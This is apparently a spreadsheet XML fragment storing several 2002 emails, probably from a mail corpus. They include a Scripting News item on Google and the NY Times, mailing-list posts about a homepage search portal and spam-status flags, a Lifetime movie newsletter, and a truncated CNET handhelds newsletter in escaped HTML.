 Adrian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</si>
  <si>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Looks like Google did a deal to index the NY Times. If you do
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:53:42AM
 Date: Tue, 24 Sep 2002 15:53:42 GMT
 Looks like Google did a deal to index the NY Times. If you do this news search
 [1], and mouse over the link, you'll see there's a partner attribute on the 
 URL, like the ones in our links[2]. What are the implications of this? Here's 
 one. Martin Nisenholtz may now have a _chance_ of winning his bet[3] with me. 
 ";-&gt;"
 [1] http://news.google.com/news?hl=en&amp;q=%22new+york+times%22+blog
 [2] http://www.nytimes.com/2002/09/24/technology/24GOOG.html?ex=1033444800&amp;en=0557fe246dd68b12&amp;ei=5007&amp;partner=USERLAND
 [3] http://www.google.com/search?hl=en&amp;lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;safe=off&amp;q=nisenholtz+winer&amp;btnG=Google+Search
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Home Pages for Computer Scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">I was doing a search on some research papers on computer science and
 ran across one of the most useful examples of public vertical search portals.
 http://hpsearch.uni-trier.de/hp/
 It's the home pages of 62,179 computer scientists.
 Mostly broken, but 50/50 on better title hits than DBLP.
 One thing that's interesting is that for Google's
 "Similar Pages", only one homepage which returns the FoRK Archive is
 the page below[1] Is he on FoRK.  Other similar pages
 include printer toner, home mortgages, and one for the origins of the
 prime radiant[2] which I found out is an Asmiov concept.
 The concept of a prime radiant is that there
 is a single interconnected FoRKlist that ties a large number of
 decentralized individuals throughout the world who's collective
 wisdom is a good model for predicint the future.
 Greg
 [1] http://www.eecs.umich.edu/~jfm/roberto.html
 [2] http://www.prime-radiant.com/primeorigins.html
 Greg
 -- 
 Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
 Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Suggestion - 2 levels of Spam Status
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 15 Sep 2002 the voices made Marc Perkel write:
 &gt; Right now we have one spam status flag indicating that a message is or
 &gt; is not spam. The idea being that the end user perhaps make a rule that
 &gt; would move the spam flagged messages into a spam folder and thus gain
 &gt; some time by presorting messages into to piles.
  If you (people) don't know enough to filter on the actual score they've got
 the "stars", which will give them more than enough levers, if they want it.
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'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</si>
  <si>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Movies to Watch on Lifetime
</t>
  </si>
  <si>
    <t xml:space="preserve">LIFETIME MOVIE NEWSLETTER
 This Week's Movies to Watch on Lifetime
 [ http://www.lifetimetv.com/movies/index.html ]
 August 19, 2002
 *************************************************************************
 COMING AT YOU THIS WEEK...
 1) "THE SECRET LIFE OF ZOEY" PREMIERE!
 2) THE BUZZ ABOUT THE UPCOMING MOVIE
 3) MOVIES AIRING THIS WEEK
 4) BIG EVENT: A MARTINEZ SUNDAY
 5) FUN AND GAMES
 *************************************************************************
 "THE SECRET LIFE OF ZOEY" PREMIERE!
 Take a sneak peek at Lifetimes next exciting Original Movie, "The Secret Life of Zoey" [ http://www.lifetimetv.com/movies/info/move3195.html ], airing on Monday, August 19 at 9 pm et/pt. Zoey's mom thought she knew everything about her perfect teenage daughter. But when she realizes that her child is addicted to drugs, both of their worlds spin out of control. This dramatic film delves into the topic of teenage drug addiction and features stellar performers Mia Farrow, Andrew McCarthy and Julia Whelan, from TV's "Once and Again." Go behind the scenes with the cast [ http://www.lifetimetv.com/movies/originals/bio1.html ],
 read real-life recovery stories of teen drug addicts [ http://www.lifetimetv.com/reallife/health/features/teen_addiction.html ], and learn how to keep your kids drug-free with 10 expert tips [ http://www.lifetimetv.com/reallife/health/features/drug_free.html ].
 *************************************************************************
 THE BUZZ ABOUT THE UPCOMING MOVIE
 People are already talking about the sensitive subject of kids and drug addiction featured in "The Secret Life of Zoey."
 Lifetimetv.com community member BELFAST BELLE writes:
 "My belief is that I started using drugs to fit in and to cope with things that happened to me. My mom died when I was 10. I had to live away from my dad and brothers. Where I grew up I was sexually abused for years, but I didn't dare tell anyone. When I finally went to live with my dad and brothers, I had no self-esteem left. I experienced so much shame, and in my mind it seemed as if everyone knew what happened. Drugs helped me to feel OK and like I was a part of something. When my dad died, I was devastated. It threw me into a full-blown addiction. My drug use landed me in rehab, in debt and in strained relationships with my brothers. Thanks to the help of Narcotics Anonymous, I have been clean since December 28, 1991. I now have great relationships with my siblings. I love them more than they will ever know. I also have a beautiful seven-year-old daughter who has never seen her mother touch drugs. I don't have any desire to use, either -- just the desire to be the best pe
  rson I can be."
 Express yourself! Tell us your thoughts on "The Secret Life of Zoey" and let us know if addiction has affected your life. Go to our Message Boards at http://boards.lifetimetv.com/WebX?14@@.ee91dd6.
 *************************************************************************
 MOVIES AIRING THIS WEEK
 "The Wrong Woman," premiering August 20 at 9 pm et/pt
 Melanie is flirting with a married man -- her boss. When he turns up dead, she is framed for his murder! Will the victim's wife help save Melanie from jail? Starring "The Division" star Nancy McKeon [ http://www.lifetimetv.com/shows/ip/portraits/0023/0023_index.html ].
 [ http://www.lifetimetv.com/movies/info/move2355.html ]
 "Hit and Run," airing August 21 at 9 pm et/pt
 Joanna is the ideal mother, wife and friend. But her "perfect" life is altered forever when she accidentally hits a young girl with her car and leaves the scene. What catches up with her first -- her conscience or the police? Starring "The Division" star Lisa Vidal
 [ http://www.lifetimetv.com/shows/division/bios/cast_lisa.html ].
 [ http://www.lifetimetv.com/movies/info/move2518.html ]
 "Get to the Heart: The Barbara Mandrell Story," premiering August 22 at 9 pm et/pt
 Barbara Mandrell plays herself in this inspiring autobiographical movie about the country-western singer's rise to fame and the car crash that nearly killed her. Also starring Dolly Parton and Kenny Rogers. Find out more about this Grammy-winning crooner [ http://www.lifetimetv.com/shows/ip/portraits/9837/9837_index.html ].
 [ http://www.lifetimetv.com/movies/info/move3180.html ]
 "Road Rage," airing August 23 at 9 pm et/pt
 It's just another day on the freeway for Ellen Carson, until she innocently cuts off Eddie, a short-tempered delivery driver who is upset over recent deaths in his family. Then Ellen and her loved ones become the stalking targets of Eddie's violent wrath. Starring Yasmine Bleeth.
 [ http://www.lifetimetv.com/movies/info/move3002.html ]
 *************************************************************************
 BIG EVENT: A MARTINEZ SUNDAY
 Tune in on Sunday, August 25, for a day filled with movies showcasing heartthrob A Martinez, who stars in Lifetime's exciting new legal series, "For the People" [ http://www.lifetimetv.com/shows/ftpeople/index.html ].
 "She-Devil," airing August 25 at 12 pm et/pt
 When Ruth's husband, Bob, leaves her for another woman, Ruth devises a devious plot to ruin both their lives piece by piece. It's a face-off between Roseanne Barr and Meryl Streep!
 [ http://www.lifetimetv.com/movies/info/move1455.html ]
 "Manhunt: Search for the Night Stalker," airing August 25 at 2 pm et/pt
 This true story recalls how famed serial killer Richard Ramirez terrorized Los Angeles for six months by murdering people in their own homes. See how the cops finally caught this vicious criminal.
 [ http://www.lifetimetv.com/movies/info/move1881.html ]
 "Sweet Dreams," airing August 25 at 4 pm et/pt
 She wakes up from a coma and nothing is as it seems. Will she regain her memory and realize that her husband and his mistress are out to get her? Starring Tiffani-Amber Thiessen.
 [ http://www.lifetimetv.com/movies/info/move2676.html ]
 "Cruel Justice," airing August 25 at 6 pm et/pt
 After his daughter's rapist is set free by the courts, a father seeks justice on his own terms.
 [ http://www.lifetimetv.com/movies/info/move3023.html ]
 ***********************************************************************
 FUN AND GAMES
 Think you're ultimate film fanatic? Prove it! Play Cinema Sequence and see if you really know all the star facts and flick stats [ http://www.lifetimetv.com/movies/games/cinemaseq/index.html ].
 ***********************************************************************
 SUBSCRIPTION INFORMATION FOR THE LIFETIME MOVIE NEWSLETTER
 Please do not reply to this e-mail; it's automatically generated, and this mailbox is not read by anyone. Therefore you will not get a response. If you wish to be removed from the Lifetime Movie Newsletter mailing list, please send an e-mail to unsubscribe-movies@email.lifetimetv.com. If you are a My Lifetime member and wish to add to or modify your current newsletter preferences, please go to http://www.lifetimetv.com/cgi/edit_profile.cgi and change your subscription options. If you need to write to us, please do so at subscriptions@lifetimetv.com. Thank you.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;CNET Handhelds Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;div align="center"&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
       &lt;td width=442 colspan=4&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/hh_hdr.gif" width=442 height=60 alt="Handhelds Newsletter"&gt;&lt;br&gt;
 &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;
 &lt;td width=10 rowspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;
 &lt;td width=430&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 &lt;!-- skyscraper column --&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_b.gif" width=160 height=18&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 &lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width=120 height=10 alt="advertisement"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;&lt;br&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 &lt;img src="http://cnet.comhttp://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
  &lt;option value="http://download.cnet.com/downloads/0,10150,0-10000-103-0-1-7,00.html?tag=srch&amp;qt=%%q%%&amp;cn=&amp;ca=10000"&gt;Downloads
  &lt;option value="http://cnet.search.com/search?tag=ex.downloadmac.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.downloadmac.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
         &lt;!-- right column content --&gt; &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/dl/rhc_sh10.gif" width=150 height=20 alt="Shopper Top 10"&gt;&lt;br&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 		&lt;tr&gt;&lt;td width=150&gt;
         		&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Top-selling handhelds:&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;
 					&lt;ol&gt;&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOrlPcdkeXO_Iti64Q9t8uR" &gt;Toshiba Pocket PC e310&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XiP4Q-DR-pEvKY-qkCKsR" &gt;Palm m515&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2asldIZrSkMRUVolYrBZR" &gt;Handspring Treo 90&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIslKaPXozY0VXXjhrHNHdR" &gt;Compaq iPaq H3835&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPu7f3hbjJlh9GpMUHM3rR" &gt;Palm Vx&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDC4WwO-lWhKPAKa1CPIPR" &gt;Handspring Treo 270&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWc-HKfZUkfLHDx1984BOnR" &gt;Sony CLIE PEG-NR70V&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyXW5WSV4Mzb-Byo4hJdcR" &gt;Sony CLIE PEG-T615C&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBE5Xr7MUOvAKcnvjbgwRR" &gt;Palm m130&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZBRtJqAuWRaT-Dc13yE_FR" &gt;Toshiba Pocket PC e740&lt;/a&gt;
 					&lt;/ol&gt;&lt;/font&gt;
        			&lt;font face="Arial, Helvetica, sans-serif" size="-2"&gt;Find the latest prices for these and other handhelds on
 				&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWFrE1SK1o7c7YuNDxuyC9R" &gt;&lt;b&gt;CNET Shopper.com&lt;/b&gt;&lt;/a&gt;.
 			&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;&lt;div align=center&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/rhc_addspot.gif" width=150 height=20 alt="Add-on Spotlight" vspace="4"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/div&gt;
 &lt;tr&gt;&lt;td&gt;&lt;div align=center style="padding-bottom: 3px;&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw_wD3wCKjnbcumX6cvbuR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/co/ps/120/7029816_120_1.gif" width=120 height=90 border=0&gt;&lt;/a&gt;&lt;br&gt;&lt;div align=left&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2YqCPBqntvDA4oSMpoLsR" &gt;&lt;b&gt;Handspring Eyemodule2&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-2"&gt;Though it's a little expensive, the Eyemodule2 is a well-designed camera attachment that offers acceptable image quality&lt;/div&gt;&lt;div align="left"&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjktLc0VvRsUb9HGRJ1bfZR" &gt;Check latest prices&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/rhc_hhnews.gif" width=150 height=20 alt="Latest Handhelds News"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIcz6qAzb7q0geUef92iqrwdR" &gt;Start-up nears launch for Hiptop handheld&lt;br&gt;
                 &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6yATlAXMCGLs-y39w-_cR" &gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Start-up shrinks PC to palm size&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
           &lt;!-- featured reviews --&gt;
           &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/rhc_handcov.gif" width=150 height=20 alt="More Handhelds Coverage"&gt;&lt;br&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
             &lt;td&gt;
  &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU8lghO4j-8g-rrsLKFK0PR" &gt;Most popular Palm downloads&lt;/a&gt;&lt;br&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfXctnIfZNGWF8w6YrPhnR" &gt;Most popular Pocket PC downloads&lt;/a&gt;&lt;br&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBfv8BQNnXmFz_e0CvgparR" &gt;Top 5 handhelds&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn70h0jI4UPDuYWD0V_WyRR" &gt;Editors' Choice handhelds&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1CJ5mSe7fQffN5r5ls4FR" &gt;News&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUwc6-3H5Ilq9S_p8qkEi9R" &gt;Product reviews&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsKTU51tyIFjAi_TOlRfXuR" &gt;Wireless handhelds&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzid1iKbHENBEZdihv9KsR" &gt;Software&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXJUy6TWHpiaRL6DCwol9R" &gt;Downloads&lt;/a&gt;&lt;br&gt;
 &lt;/b&gt;
 &lt;p&gt;
               &lt;/td&gt;
           &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;td width=9 rowspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 &lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=9 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000" rowspan=2&gt;&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=60&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=430 bgcolor="#ffffff"&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 &lt;tr valign=top&gt;
         &lt;td rowspan=2 width=10&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=10 height=1&gt;&lt;/td&gt;
         &lt;td colspan=2&gt;&lt;font face="arial, helvetica" size="-2"&gt;&lt;br&gt;July 9, 2002&lt;/font&gt;&lt;br&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt; &lt;!-- intro --&gt; &lt;font face="arial, helvetica" size="-1"&gt;
 When reviewing the Toshiba Pocket PC e740, I spent a lot of time trying to understand its XScale processor. A benchmark provided by Intel seems to indicate that it performs certain operations faster than previous Pocket PCs, but in hands-on use we didn't find any significant difference in performance. I'm still not certain whether I should attribute performance limitation to the operating system (which hasn't been optimized for the new chips), applications (which likewise haven't be optimized), or simply that the new chip isn't that much better than the old StrongARM. But regardless, the e740 is an exceptional Pocket PC and one I don't hesitate to recommend to those looking for a high-powered PDA.
 &lt;!--
 &lt;font size=3 color="#333333"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt; --&gt;&lt;br&gt;
 				&lt;!--
 					&lt;div align=right&gt;
 					&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CDzlR2_Nv0T0QkY6b7uR" &gt;Read the full story&lt;/a&gt;  &amp;nbsp;|&amp;nbsp;
 					&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdArfP6VXfuo4I9yc99NcsR" &gt;Check latest price&lt;/a&gt;&lt;/div&gt; --&gt; &lt;br clear="all"&gt;
 					Colin Duwe&lt;br&gt;
 					Associate Editor&lt;br&gt;
 					CNET Electronics
               		&lt;/font&gt;&lt;/td&gt;
             &lt;td width=10&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=10 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td bgcolor="#999999"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- most popular --&gt;
         	&lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
         		&lt;TR&gt;&lt;TD colspan=2&gt;&lt;!-- cnet's exclusive downloads --&gt;
 					&lt;A name=h1&gt;&lt;IMG alt="CNET's Exclusive Downloads" height=19 src="http://a.r.tv.com/cnet.1d/i/nl/dl/sub_top10.gif" width=250&gt;&lt;BR&gt;
 					&lt;IMG height=8 src="http://a.r.tv.com/cnet.1d/i/nl/rule.gif" width=410&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr valign=top&gt;&lt;td width=50%&gt;
 					&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;In Palm OS:&lt;/B&gt;&lt;BR&gt;&lt;/FONT&gt;
             		&lt;TABLE border=0 cellPadding=4 cellSpacing=0 width="100%"&gt;
                 		&lt;TR&gt;&lt;TD height=36 width="6%"&gt;&amp;nbsp;&lt;/TD&gt;
                 			&lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 							&lt;B&gt;Most	Popular Titles&lt;/B&gt;&lt;BR&gt;
 							&lt;FONT size=-2&gt;Week ending June 11&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
               			&lt;/TR&gt;
               			&lt;TR&gt;&lt;TD colSpan=2&gt;
                   			&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     			&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 							&lt;/TABLE&gt;
 						&lt;/TD&gt;&lt;/TR&gt;
               			&lt;TR align=middle&gt;&lt;TD height=32 width="6%"&gt;
 							&lt;FONT face="ms sans serif, geneva" size=-2&gt;1&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzFSlDlPdhQ93KjZ6eJcnZR" &gt;Noah Lite English dictionary&lt;/A&gt;
 						&lt;/TR&gt;
               			&lt;TR&gt;&lt;TD colSpan=2&gt;
                   			&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     			&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 							&lt;/TABLE&gt;
 						&lt;/TD&gt;&lt;/TR&gt;
               			&lt;TR align=middle&gt;&lt;TD height=32&gt;
 							&lt;FONT face="ms sans serif, geneva" size=-2&gt;2&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpI6SWBkRrAu7hgvo2AKenR" &gt;DopeWars (Palm)&lt;/A&gt;
 							&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;3&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLj9fa4buK4JYndFK-AWlrR" &gt;Blocks&lt;/A&gt;
 							&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;4&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3_d07Ul1okYP2r70U6iR" &gt;Palm Desktop&lt;/a&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;5&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBHC_AtJ2VFm8il40AWNdR" &gt;Sketcher&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
               			&lt;/TR&gt;
               			&lt;TR&gt;&lt;TD colSpan=2&gt;
                   			&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     			&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 							&lt;/TABLE&gt;
 						&lt;/TD&gt;&lt;/TR&gt;
 					&lt;/TABLE&gt;
 					&lt;DIV align=left&gt;&lt;FONT face="arial, helvetica" size=-2&gt;&lt;BR&gt;
 					&lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKMoK0MFdGkeHaXeD3gBcR" &gt;
 					&lt;B&gt;All popular Palm OS downloads&lt;/B&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 				&lt;/td&gt;
 				&lt;td width"50%"&gt;
 				&lt;FONT size=-1&gt;&lt;B&gt;&lt;FONT face="arial, helvetica"&gt;In Pocket PC:&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 				&lt;TABLE border=0 cellPadding=4 cellSpacing=0 width="100%"&gt;
               		&lt;TR&gt;&lt;TD height=36 width="6%"&gt;&amp;nbsp;&lt;/TD&gt;
